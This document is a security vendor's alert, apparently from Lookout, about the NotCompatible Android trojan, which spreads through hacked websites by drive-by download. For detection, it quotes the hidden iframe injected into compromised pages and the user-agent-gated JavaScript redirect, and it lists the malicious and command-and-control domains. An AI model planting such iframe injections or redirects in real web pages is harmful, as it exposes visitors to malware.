UPDATE: Security Alert: Hacked Websites Serve Suspicious Android Apps (NotCompatible)

UPDATE: Security Alert: Hacked Websites Serve Suspicious Android Apps (NotCompatible)

Update Two: Based on our current research,  NotCompatible is a new Android trojan that appears to serve as a simple TCP relay / proxy while posing as a system update. This threat does not currently appear to cause any direct harm to a target device, but could potentially be used to gain illicit access to private networks by turning an infected Android device into a proxy. As previously mentioned, this appears to be the first time that compromised websites have been used to distribute malware targeting Android devices.

Distribution of NotCompatible depends on compromised websites that have a hidden iframe at the bottom of each page. If a user visits a compromised website from an Android device, their mobile web browser will automatically begin downloading the NotCompatible application, named ‘Update.apk’. Like any drive-by downloads, a user needs to install the downloaded application before a device will be infected. Based on our initial investigation, we’ve confirmed that a number of websites have been compromised. However, affected sites appear to show relatively low traffic and we expect total impact to Android users to be low.

This specific sample, while relatively well constructed, does not appear to go to great lengths to hide its intended purpose: it can be used to access private networks. This feature in itself could be significant for system IT administrators: a device infected with NotCompatible could potentially be used to gain access to normally protected information or systems, such as those maintained by enterprise or government.

Update: All Lookout users are currently protected against NotCompatible.  Lookout protects users from drive-by downloads when the features File System Monitoring and Install Monitoring are active.  These additional layers of protection alert users to known threats when they are downloaded to device storage, such as the /Downloads folder on the SD Card, and immediately before they are installed via sideloading.

Hacked websites are frequently used to infect PCs with malware; however, today we have identified the first time hacked websites are being used to specifically target mobile devices.  Lookout is in the process of rolling out an update to protect against the new threat,  NotCompatible.

How it Works

In this specific attack, if a user visits a compromised website from an Android device, their web browser will automatically begin downloading an application—this process is commonly referred to as a drive by download.

When the suspicious application finishes downloading, the device will display a notification prompting the user to click on the notification to install the downloaded app.  In order to actually install the app to a device, it must have the “Unknown sources” setting enabled (this feature is commonly referred to as “sideloading”).  If the device does not have the unknown sources setting enabled, the installation will be blocked.

Technical details

Infected websites commonly have the following code inserted into the bottom of each page:
<iframe
style=”visibility: hidden; display: none; display: none;”
src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>

We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous.

When a PC-based web browser accesses the site at gaoanalitics.info, a not found error is returned; however, if a web browser with the word “Android” in its user-agent header accesses the page, the following is returned:

<html><head></head><body><script  type=”text/javascript”>window.top.location.href = “hxxp://androidonlinefix.info/fix1.php”;</script></body></html>

This page causes the browser to immediately attempt to access the page at androidonlinefix.info.  Like the previous site, only browsers sending an Android User-agent string will trigger a download (all other browsers will show a blank page).  When visiting this page from an Android browser, the server returns an android application, causing an Android browser to automatically download it.

Suspicious applications are currently served from the following sites:

• gaoanalitics.info
• androidonlinefix.info

Command and Control (C&C) domains include:

• notcompatibleapp.eu

We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous.  As Lookout identifies the extent of infected websites, we will update this blog post.

The Lookout security team is actively investigating the infected websites and suspicious application.  Refer back to this blog post for regular updates on this security alert.